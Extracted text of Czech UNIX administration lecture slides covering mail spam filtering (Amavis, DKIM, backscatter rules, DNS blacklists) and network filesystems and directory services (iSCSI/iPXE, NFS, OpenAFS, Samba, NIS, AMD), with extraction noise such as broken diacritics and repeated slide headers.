využívání filtrovacích serveru/služeb ˚ (spamassassin, spamd, clamd) filtrovací systémy (amavis) blokování seznamu˚ IP adres, odesílatelu, ˚ domén, státu puvodu ˚ podpora na FW (spamd + feed blokovaných z poštovního systému) ˇ rovacích modulu˚ (DKIM) nasazení oveˇ
Boj proti SPAMu
Cviˇcení
ˇ Filtrování nechtené pošty – Amavis
Administrace UNIXu Leo Galamboš E-mail Volba MTA
ˇ spustí se nekolik (puvodn ˚ eˇ virgin) démonu˚ každý z démonu˚ aplikuje filtry a modifikuje vstupní e-mail: ˇ zprávy (***** SPAM *****) modifikace pˇredmetu ˇ zmena adresáta (na virusalert@, spamalert@) odtržení viru, ˚ atp.
výsledek je poslán pˇres SMTP do druhé instance MTA dynamická adaptace: sdílený SPAM/HAM box (IMAP) monitorování cˇ innosti: mailgraph
Sendmail Postfix Boj proti SPAMu
Cviˇcení
Administrace UNIXu
Amavis diagram
Leo Galamboš E-mail
smtpd :25
clamd
Volba MTA Sendmail Postfix Boj proti SPAMu
amavis :10023 smptd :10024
plain SMTP unauth TLS (destination) auth TLS (relay)
Cviˇcení
spamassassin
Přístup pouze z localhost smtpd :10025
ˇ rování pošty – OpenDKIM Oveˇ
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
ˇ démon opendkim na pozadí beží má k dispozici klíˇc k podpisu položek pˇri podpisu lze klíˇce volit dle domény zdroje prochází jím veškerá odchozí pošta (milter postfix-u)
ˇ amavisd pˇri pˇríjmu kontrolu muže ˚ provádet ˇ rí podpis dle veˇrejného klíˇce v DNS pˇríjemce oveˇ (TXT RR)
Cviˇcení
ˇ rování pošty – OpenDKIM Oveˇ
Administrace UNIXu Leo Galamboš E-mail
... Authentication-Results: my.egothor.org (amavisd-new); dkim=pass (1024-bit key) header.d=egothor.org ... DKIM-Filter: OpenDKIM Filter v2.10.3 my.egothor.org DFBEF2610A8 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=egothor.org; s=default; t=1446135505; [email protected]; bh=47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=; h=From:Subject:Date:From; b=oHN5neuUZ8aR4PUJVBvPOYYbLP15uQHagZdXW7IfSY7Avv0EL50C5jcyVU9iapuYW BYeQ4wzsRjkLdoCIDfgPHM63MtRKez4CpnZNZ4t5Ou7q8jMGbT0j3ciY2/hKNvS7cp J2SGKDT5VDnhw85UhnEse7fPgehbWlo70MewgrPM=
# dig default._domainkey.egothor.org IN TXT default._domainkey.egothor.org. 3600 IN TXT "v=DKIM1; k=rsa; t=y; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCwE8RL2JZoo0eLjnFxzoL1/QrHe hKeg3ztMZK8Te1E6SrLvL1pf6tK71xjhvnn6xQ4sk89ExsL7X+LEUI6JW6lF2f6GM3 Pp49GXPOFFFy8xRtpNseWKkbXbRx5tucjx4RH9kzotHF7X2mC2QigfuDmS5lZ3h4AC o2s+IfUmmqW7QIDAQAB"
Volba MTA Sendmail Postfix Boj proti SPAMu
Cviˇcení
Backscatter
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix
ˇ SPAMer použije adresu nevinné "obeti"jako odesílatele ˇ [email protected] ˇ naše obet’: cílové stroje bud’ odmítnou SPAM, anebo se SPAMer trefuje na neexistující pˇríjemce zaˇcne vznikat velké množství nedoruˇcenek ˇ pˇríjem zajišt’uje server se schránkou obeti ˇ pokud poštu pˇrijmeme, zahltíme schránku obeti
Boj proti SPAMu
Cviˇcení
Backscatter - ˇrešení 1
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail
ˇ je neexistující emailová adresa. Obetí
Postfix Boj proti SPAMu
Cviˇcení
Postfix v defaultní konfiguraci odmítá pˇríjem.
Poznámka: nemá smysl zamezovat samotným TCP spojením, nebot’ nepocházejí od SPAMera.
Backscatter - ˇrešení 2
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
ˇ je existující emailová adresa. Obetí
Z analýzy hlaviˇckových údaju˚ v nedoruˇcence zjistíme, zda šel takový email skuteˇcneˇ od nás. Hledat mužeme ˚ jak položky Message-ID nebo i Received.
Cviˇcení
Backscatter - ˇrešení 2
Administrace UNIXu Leo Galamboš E-mail
Kontrola hlaviˇckových údaju˚
Volba MTA Sendmail Postfix
header_checks = pcre:/etc/postfix/header_checks
Boj proti SPAMu
Cviˇcení
/^Received:.* +by +(egothor\.org)\b/ REJECT forged mail server name in Received: header: $1
Kontrola obsahu (viz odsazení v regex-u) body_checks = pcre:/etc/postfix/body_checks /^[> ]*Received:.* +by +(egothor\.org)\b/ REJECT forged mail server name in Received: header: $1
ˇ Blokování nechtené pošty
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail
MTA muže ˚ implementovat whitelisting – seznam nepovolených (Realtime Blackhole List) IP, které se blokují graylisting – seznam povolených IP, ostatní se jen doˇcasneˇ blokují (bulkmailery spameru˚ na tom ˇ vetšinou shoˇrí)
Problém Jak spravovat seznamy (ne)povolených?
Postfix Boj proti SPAMu
Cviˇcení
DNS Black List
Administrace UNIXu Leo Galamboš
1
2
3
4
pˇríjímací MTA zjistí IP odesílajícího MTA, napˇr. 192.168.300.1 adresa se otoˇcí jako pˇri revers DNS, tj. 1.300.168.192 suffix se použije jméno DNSRBL, napˇr. 1.300.168.192.blacklist.ibm.com Áˇckový (A RR) dotaz do DNS ˇ “úspech” ⇒ IP je na seznamu chyba NXDOMAIN z DNS serveru ⇒ IP není v seznamu
5
ˇ (volitelné) TXT RR muže ˚ obsahovat vysvetlivku k danému záznamu
6
validní Áˇcka jsou dle úmluvy ve 127/8, konkrétní hodnoty mají i dohodnutý význam
E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
Cviˇcení
Administrace UNIXu
Konfigurace DNSBL
Leo Galamboš E-mail
$TTL 2d $ORIGIN blacklist.ibm.com @ IN SOA ns.ibm.com. hostmaster.ibm.com. ( 2006110101 ; serial number 3h ; refresh 15m ; retry 3w ; expiry 3h ; minimum ) IN NS ns.ibm.com. IN NS ns2.ibm.com. # dle dohody slouží následující Áˇ cko pro # externí testování 2.0.0.127 IN A 127.0.0.2 # black list 1.300.168.192 ...
IN IN
A TXT
127.0.0.2 "Spammer"
Volba MTA Sendmail Postfix Boj proti SPAMu
Cviˇcení
Návratové hodnoty sorbs.net
Administrace UNIXu Leo Galamboš E-mail
127.0.0.2 Open HTTP Proxy Server (http.dnsbl. . . )
Volba MTA
127.0.0.3 Open SOCKS Proxy Server (socks.dnsbl. . . )
Postfix
127.0.0.4 Open Proxy Server not listed in the SOCKS or HTTP lists (misc.dnsbl. . . ) 127.0.0.5 Open SMTP relay server (smtp.dnsbl. . . ) 127.0.0.6 Hosts sending spam/UCE/UBE to SORBS, netblocks of spam supporting service providers (spam.dnsbl. . . ) 127.0.0.7 Web servers email vulnerabilities (FormMail scripts, . . . ) (web.dnsbl. . . ) 127.0.0.8 Hosts demanding not to be tested by SORBS (block.dnsbl. . . ) 127.0.0.9 Networks hijacked from original owners (zombie.dnsbl. . . ) 127.0.0.10 Dynamic IP Address ranges (dul.dnsbl. . . ) 127.0.0.11 Domain names with bad A or MX RRs (badconf.rhsbl. . . ) 127.0.0.12 Domain names with no email originating (nomail.rhsbl. . . )
Sendmail
Boj proti SPAMu
Cviˇcení
MTA: Praxe
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
zablokování anonymní relay doménový koš TLS podpora zahazování SPAMu (analýza obsahu > regulární výrazy na hlaviˇcce emailu) eliminování backscatter emailu˚ (regulárními výrazy)
Cviˇcení
Vyzkoušejte si
Administrace UNIXu Leo Galamboš E-mail Volba MTA
nainstalujte postfix inicializujte MTA (postfix) 1 2 3
postfix-enable(x) sendmail_flags=-bd -q30m crontab(1): crontab -e (disable clientmqueue)
nakonfigurujte postfix /etc/postfix/* (hlavneˇ main.cf) quick hint: cd /etc/mail;cp aliases ..;newaliases
zkuste poslat e-mail root-ovi pˇres telnet(1) sledujte záznamy v /var/log/maillog
Sendmail Postfix Boj proti SPAMu
Cviˇcení
Vyzkoušejte si: telnet localhost 25
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
Cviˇcení
Vyzkoušejte si
Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu
zaved’te si MX pro vaši doménu nechte si poslat e-mail odjinud ˇ RELAY služby nebo si je navzájem si poskytnete ˇ sami na svém dalším VPC zajistete zaved’te další MX s prioritou 0 na neplatný/neživý stroj – sledujte prodlevy pˇri doruˇcování pošty
Cviˇcení
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD
ˇ Cást V
Samba Shrnutí
NFS Nastavení
AMD, YP/NIS
RPC, NFS, AMD, Yellow Pages
Podrobnosti Vyzkoušejte si
Program
Administrace UNIXu Leo Galamboš
24
Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba
Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti
25
NFS Nastavení
26
AMD, YP/NIS
27
Podrobnosti
28
Vyzkoušejte si
Vyzkoušejte si
Administrace UNIXu Leo Galamboš
Internet
IPSec
Štít
Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba
Road warrior
Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Dohled
Vyzkoušejte si
Tisk
SMTP
Zálohování DNS
AMD
NIS/YP
NFS
Sít’ové prostˇredí
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
Požadavky jednotná báze uživatelu˚ (skupin, hesel. . . ) pˇrenositelnost prostˇredí mezi uzly (mapování disku. ˚ ..) robustnost, odolnost proti výpadkum ˚ celková bezpeˇcnost ˇrešení
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Sít’ové prostˇredí
Administrace UNIXu Leo Galamboš
Unix nabízí pˇredevším samostatné servery/služby rozdílný stupenˇ integrace
Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD
ˇ nekteré mají vlastní autorizaˇcní bázi53
Samba Shrnutí
ˇ služby54 problém s kvalitou jištení
NFS
rozdílná úrovenˇ bezpeˇcnosti55
AMD, YP/NIS
Nastavení
Podrobnosti
Centralizace autorizaˇcní báze skrze systémové vrstvy: PAM, YP, atp. knihovny/vrstvy: SASL (Courier) sít’ové služby: LDAP, MySQL, Kerberos, atp. ˇ SASL→PAM→LDAP smes: 53
Proto roste duležitost ˚ integrace všech bází do jediné. ˇ Nekteré služby nelze z principu jistit! 55 Celkovou bezpeˇcnost pak vymezuje nejslabší prvek! 54
Vyzkoušejte si
Linux PAM /etc/pam.d/system-auth
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
auth auth auth auth auth
required sufficient requisite sufficient required
pam_env.so pam_unix.so nullok try_first_pass pam_succeed_if.so uid >= 500 quiet pam_ldap.so use_first_pass pam_deny.so
AMD, YP/NIS Podrobnosti Vyzkoušejte si
LDAP
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Existující ˇrešení
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
báze uživatelu: ˚ NIS/YP, Kerberos, Samba
NFS
mapování a sdílení disku: ˚ NFS3/4, OpenAFS, Samba. . .
AMD, YP/NIS
redudance: AMD, OpenAFS, Samba bezpeˇcnost: K4/5+AFS, Samba, dále AH/ESP
Nastavení
Podrobnosti Vyzkoušejte si
Techniky sdílení disku˚
Administrace UNIXu Leo Galamboš Motivace Sdílení disku
de-facto pˇrímé: SCSI/SATA over Ethernet, . . . vhodné pro pˇripojení oblastí diskového pole (clustery) jednoduché, cˇ isté, malá režie nutnost distribuovaného zámku a vhodného FS (GFS2) ˇ vetšinou zcela bez šifrování56
zprostˇredkované: NFS, SMB, AFS, . . . vhodné pro pˇripojení (existujících) oblastí z jiného stroje ˇ cˇ asto implikuje provoz složitejších modulu˚ (šifrování, transakce/zámky)
56
Spoje bývají vedené separátními okruhy-VLANy
Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Techniky sdílení disku˚
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba
de-facto pˇrímé: block-level pˇrístup speciální SCSI (dˇríve) – problém s délkou kabelu do ˇ jen malé clustery do 4 uzlu) 25m (možnost stavet ˚ SAN/iSCSI (dnes) – disky ve speciálním racku/místnosti
zprostˇredkované server poskytuje svazky klientum ˚ vše ˇreší pˇríslušný protokol
Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Block-level pˇrístup
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS
Multipath
NIS/YP, NFS, AMD Samba Shrnutí
zajišt’uje záložní kanály ˇ v discích za plného provozu možnost zmen ˇ "nadmerná podpora"v Linuxu - problém s pˇripojováním rozdílných RAID k jednomu serveru Linux zatím postrádá jednotnou podporu pro všechna multipath zaˇrízení a automatickou rekonfiguraci po pˇripojení vypadlé cesty/zaˇrízení (2.6/2.7?)
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Block-level pˇrístup: velké nebo malé LUNy
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
Zaˇrízení vždy nepodporují obrovské LUNy
NFS
Recovery i backup velkého LUNu zabere více cˇ asu
AMD, YP/NIS
ˇ variabilitu Malé poskytují vetší Malé implikují velký poˇcet LUNu˚ Linux/2.6/i386 4096, Linux/amd64 až 32768 LUNu˚
Nastavení
Podrobnosti Vyzkoušejte si
Block-level pˇrístup: domácí nasazení
Administrace UNIXu Leo Galamboš
v BIOSu povolen start ze síteˇ (PXE57 ) PXE je v dodávaných PC zastaralé, napˇr. neumí iSCSI PXE tedy jen zavede iPXE, které je mocné DHCP doruˇcí položky Next-server58 a Boot-file-name59
iPXE si umí stáhnout svoji konfiguraci z HTTP UNDIonly.kpxe je ‘make bin/undionly.kpxe EMBED=mydisk.ipxe‘ mydisk.ipxe je skript ‘dhcp ; chain http://192.168.400.2/${net0/mac}‘
iPXE umí napˇríklad start s iSCSI jako boot-diskem
57
Preboot execution environment TFTP server 59 Bootovací obraz - zde typicky iPXE UNDIonly.kpxe 58
Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Block-level pˇrístup: domácí nasazení
Administrace UNIXu Leo Galamboš Motivace Sdílení disku
Obsah ‘chain http://192.168.400.2/${net0/mac}‘
Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
#!ipxe
NFS Nastavení
# Widle workaround set gateway 0.0.0.0 set net0/gateway 0.0.0.0 set keep-san 1 sanboot iscsi:192.168.400.3:::2:\ iqn.2014-07.org.egothor:red
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Disková pole, fyzické sdílení
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
fiber linky i v ˇrádu km, dnes ethernet 802.3ad zjednodušení zálohování a oprav (centralizace)
Dostupné distribuované FS
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
Starší: NFS, AFS (Arla), DFS Moderní Otevˇrené: Lustre, OpenGFS, klient IBM SAN FS Proprietární: SGI CXFS, IBM GPFS
Cílové parametry: desítky tisíc uzlu, ˚ PB dat, transfer stovek GB/s
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Varování! Local/last-close sémantika
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD
A B
o
w o
w w
w
c
Samba Shrnutí
c
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Nebezpeˇcí pro serverové aplikace! Local: w(B)w(A) Last-close: w(B)w(B)
Kerberos, OpenAFS
Administrace UNIXu Leo Galamboš Motivace Sdílení disku
uživatel se autorizuje proti K4/5 klog(?) získá tak lístek/token do “systému” tokens(?)
Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
ˇ ruje platnost lístku˚ AFS si oveˇ
NFS
svazky jsou pˇrístupné na zvláštním mount-pointu
AMD, YP/NIS
Nastavení
Podrobnosti
ˇ (cells) AFS organizuje sít’ do bunek ˇ bunka nabízí diskové svazky (volume) replikuje a zálohuje svazky
rozšíˇrená ACL jsou volní klienti jak pro Unixy tak Windows
Vyzkoušejte si
ˇ OpenAFS - jméno vlastní bunky
Administrace UNIXu Leo Galamboš
Windows
Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Unix /etc/openafs/ThisCell
ˇ OpenAFS - seznam bunek
Administrace UNIXu Leo Galamboš
Windows
Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Unix /etc/openafs/CellServDB
OpenAFS - management
Administrace UNIXu Leo Galamboš
Windows
Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Unix
NIS/YP, NFS, AMD
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
ˇ integrace do O/S, sdílení map (systémových silnejší bází) pˇripojení svazku mount.nfs(8) problematické udržování replik svazku˚ problémy s bezpeˇcností (ˇreší NIS+, NFS4) není volný klient pro NFS4 na Windows
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Samba
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
pˇredevším pro integraci UNIX stanic do Windows prostˇredí (a naopak) “nativní” implementace sdílení známého z OS2/Windows sdílení svazku˚ i tiskáren
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Ryze subjektivní hodnocení
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS
Výhody
NIS/YP, NFS, AMD Samba Shrnutí
AFS bezpeˇcnost, redundance NFS výkon, jednoduchost ˇ SMB schopnost integrace se svetem Windows
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Nevýhody AFS komplexní správa NFS bezpeˇcnost, kvalitní redundance SMB bezpeˇcnost, kvalitní redundance
Network File system (verze 260 , 361 )
Administrace UNIXu Leo Galamboš
Verze 3 offsety 64b (ver2: 32b), filehandle až 64B (ver2: pevneˇ 32B) 56KB R/W UDP (ver2: 8KB) READDIRPLUS (filehandle+attr) eliminuje LOOKUP pˇri scan adresáˇre
Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti
exclusive CREATE PATHCONF definuje maximální délky jmen souboru˚ a cest všechny chybové stavy definované specifikací nový NF3ERR_JUKEBOX (aka try later) ACCESS (test ACL pˇrímo na serveru) WRITE, COMMIT plneˇ async 60 61
RFC1094 RFC1813
Vyzkoušejte si
Nedostatky
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS
bezpeˇcnost (NFS ver 4, šifrování spoje)
NIS/YP, NFS, AMD Samba Shrnutí
problémy s fragmentací pˇrenosu (nastavení menšího UDP R/W bloku než je MTU, TCP) sdílení UID, GID, ACL (NIS) chudé ACL stabilita mount-u (AMD – kopie svazku˚ na záložních uzlech) NFS3 je bezestavový (NFS4 je stavový) NFS4 snižuje poˇcet kontaktu˚ klient-server až 5x
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Kontrola – utility
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
nfsstat(1) -c/-s – statistika NFS klienta/serveru rpcinfo(1) -p – seznam server-procesu˚ napojených na RPC showmount(8) -a/-e – seznam pˇripojených/mount uzlu˚
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
ˇ NFS – nekteré duležité ˚ parametry
Administrace UNIXu Leo Galamboš Motivace Sdílení disku
-b:bg FAIL → zkoušej dál na pozadí
Kerberos, OpenAFS NIS/YP, NFS, AMD Samba
hard server spadl → BLOCK -s:soft server spadl → ohlas FAIL -t:timeo retry v 1/10sec -i:intr uživatel muže ˚ zrušit požadavek když cˇ eká na vypadlý server -2 NFS v2 -3 NFS v3 -T TCP -U UDP
Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
NFS – procesy
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
portmap mapování mezi RPC prg-num a porty obslužných RPC procesu˚ mountd validuje mount požadavky klientu˚ s ohledem na exports(5) nfsd R/W od klientu˚ rquotad hlídá kvóty uživatelu˚ (fBSD)
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
/etc/exports – zrady a nástrahy
Administrace UNIXu Leo Galamboš
ˇrádek specifikuje exportní info pro jeden souborový svazek na jeden host
Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba
jeden host muže ˚ být specifikován jen jednou pro daný svazek
NFS
ˇ HUP do mountd(8) reload zmen:
AMD, YP/NIS
Shrnutí
Nastavení
Podrobnosti
Chybneˇ # celý /usr je jeden svazek /usr/local klient1 /usr/ports klient1
Správneˇ /usr/local /usr/ports klient1
Vyzkoušejte si
ˇ Rešení nedostupnosti
Administrace UNIXu Leo Galamboš
zvýšení stability NFS serveru
Motivace Sdílení disku Kerberos, OpenAFS
zvýšení stability síteˇ automounter, který pˇripojuje/odpojuje svazky podle aktuální dostupnosti62
NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
AMD, YP/NIS
Plán pro cviˇcení Protože automounter cˇ te mapu s definicí souborových ˇ zdroju˚ a jejich umístení, je možné ho donutit cˇ íst “centrální mapu”. Centrální mapu mu doruˇcíme po síti a tím dostaneme box vhodný napˇríklad jako klientské PC pro menší laboratoˇr. Zárovenˇ s mapou svazku˚ mu mužeme ˚ doruˇcit i passwd (a další báze) a mít opravdový laboratorní box.
62
ˇ málo pozdeji ˇ Takový software uvidíme o neco
Podrobnosti Vyzkoušejte si
ˇ Rešení (ne)bezpeˇcnosti
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
ˇ jitter: Pˇrikrytí pomocí IPsec (bude pozdeji),
NFS Nastavení
0,10ms – pˇrímý spoj
AMD, YP/NIS
ˇ 0,30ms – pˇres smerovaˇ c
Podrobnosti Vyzkoušejte si
ˇ 0,70ms – pˇres smerovaˇ c skrze IPsec ˇ Smerovaˇ c lze eliminovat vhodným L2 prvkem.
Vyzkoušejte si – NFS server
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS
1
portmap=YES
2
nfs_server=YES
3 4 5
lockd=YES nfsd_flags=-tun 20 /etc/exports(5): místo na svazku: /home pˇremapování práv: -maproot=0 omezení pˇripojení: -network ... -mask ...
6
reboot nebo start portmap, nfsd, mountd, rpc.lockd
7
kontrola: rpcinfo -p
NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Vyzkoušejte si – NFS klient
Administrace UNIXu Leo Galamboš Motivace
Inicializace parametru˚ v /etc/sysctl.conf: vfs.nfs.iothreads=10
Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
Staˇcí obyˇcejný mount_nfs(8), který lze vložit i do /etc/fstab(5):
AMD, YP/NIS Podrobnosti
nfs.lg:/r/home /home nfs rw,nosuid,soft,intr 0 0
ˇ Mount defaultneˇ probehne na ver3, fallback na ver2 (lze vynutit parametry mount_nfs(8): -3, -2): mount_nfs -3 -b -s -i nfs.lg:/remote/home1 /home
Vyzkoušejte si
AMD, YP/NIS
Administrace UNIXu Leo Galamboš
NIS je Network Information System, který v rámci své domény63 poskytuje klientum ˚ mapy (soubory) s ˇ “nejakými” sdílenými daty
Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
mapy lze promíchat s daty na klientovi (pro správné “míchání” napˇríklad /etc/passwd je nutná podpora v systému64 ) prakticky provedeme toto: 1
2
3
63 64
nastavíme náš NFS server jako master pro naši YP/NIS doménu se sdílenými informacemi (passwd, group, hosts, aliases. . . ) nastavíme kienta, kterému ze serveru poskytneme mapu pro automounter klient si pˇrimíchá passwd a další mapy, aby byl snadno vzdáleneˇ konfigurovatelný
neplést s DNS BSD ji mají, Linux s pˇrídavným software
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Slovníˇcek
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD
NIS Network Information System YP Yellow Pages (poskytují se mapy/stránky), Yellow Pee (slangové oznaˇcení) doména stroje sdílející tutéž bázi NIS master stroj s bází (je práveˇ jeden) ˇ slave stroj s kopií báze (muže ˚ jich být nekolik) klient stroj, který využívá NIS bázi v rámci “své domény”
Samba Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Administrace UNIXu
Schéma
Leo Galamboš Motivace
YP doména mapy
Sdílení disku Kerberos, OpenAFS
Master
NIS/YP, NFS, AMD Samba Shrnutí
NFS
yppush
yppush
Nastavení
AMD, YP/NIS
ypbind
Podrobnosti Vyzkoušejte si
Slave
Slave
ypbind broadcastuje, pokud nemá seznam serveru˚ v /etc/yp/doména
Mapy OpenBSD
Administrace UNIXu Leo Galamboš
Mapa passwd group ethers netgroup networks hosts protocols services aliases rpc netid amd.home
Napojení +name:*:::::::: (master.passwd) +name:*:0:0::: (passwd) +name:*:: + +
Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Vyzkoušejte si – nastavení NIS serveru˚
Administrace UNIXu Leo Galamboš
v /etc/rc.conf zapneme portmap a pro sdílení hesel nastavíme yppasswdd_flags=
Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba
echo "mynisdom">> /etc/defaultdomain inicializace master serveru: ypinit -m doména inicializace slave serveru: ˚ ypinit -s masterhost doména hot-fix65 : vytvoˇrte adresáˇr /var/yp/binding ˇ na straneˇ serveru musí bežet ypserv(8) a spol: bud’ restartujeme nebo spustíme portmap(8), ypserv(8), ypbind(8), rpc.yppasswdd(8) kontrola zaregistrovaných RPC procesu: ˚ rpcinfo -p
65
jinak OpenBSD rc-script nespustí YP procesy
Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Inicializace
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Vyzkoušejte si – nastavení NIS klienta
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS
v /etc/rc.conf zapneme portmap
NIS/YP, NFS, AMD Samba Shrnutí
echo "mynisdom">> /etc/defaultdomain
NFS Nastavení
echo ’+:*::::::::’ >> /etc/master.passwd
AMD, YP/NIS
pwd_mkdb /etc/master.passwd
Vyzkoušejte si
echo ’+:*::’ >> /etc/group vytvoˇrte adresáˇr /var/yp/binding nebo spust’te ypbind(8) kontrola: ypcat -x, ypcat passwd
Podrobnosti
Vyzkoušejte si – Klient: AMD a export /home
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba
v /etc/rc.conf.local zapneme amd=YES
Shrnutí
NFS
echo "/home amd.home"> /etc/amd/master kontrola: ypcat amd.home vrací mapu ze serveru ˇ nad /home jak staˇcí restartovat, amd(8) pobeží ˇ jsme chteli kontrola: amq(8) zkoumejte “specifikum” /home (jak je pˇripojeno?)
Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Portmap v OpenBSD
Administrace UNIXu Leo Galamboš
Portmap v OpenBSD je specifický a v souˇcasnosti snad jediný “opravený”:
Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba
BIND povel se sbírá pouze na speciálním 127.0.0.1:111
NFS
ostatní povely mohou jít pˇres *:111
AMD, YP/NIS
originální (chybná) implementace66 posílá a poslouchá BIND povel na *:111
Podrobnosti
ˇ ceho67 dusledek: ˚ porty cˇ i nativní binární emulace neˇ RPC-love z Linuxu nemusí fungovat, protože se BINDuje s IP adresou externího adaptéru a to OpenBSD nevezme
66 67
